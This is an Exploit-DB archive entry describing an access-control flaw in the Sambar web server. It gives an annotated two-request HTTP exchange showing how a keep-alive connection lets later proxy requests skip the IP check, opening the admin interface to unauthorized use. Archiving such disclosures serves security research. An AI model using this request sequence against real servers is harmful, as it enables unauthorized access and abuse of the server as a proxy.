exploit-db-mirror/exploits/windows/remote/24076.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

20 lines
No EOL
785 B
Text

source: https://www.securityfocus.com/bid/10256/info
Sambar improperly validates the IP address of an originating connection and can be used to gain access the administration interface without authorization.
Once the remote attacker has gained access to the administrative interface, further attacks are possible, including privilege escalation and unauthorized system access.
-> GET / HTTP/1.1
Connection: keep-alive
*This is valid web server request. It's granted.
<- Sambar default web page
*Because the connection is keep-alive it's not broken after page is sent.
-> GET http://www.example.com HTTP/1.1
*This is valid proxy requests. This time source IP is not validated, because connection was established before
<- Web page from external site
*Sambar proxies our request.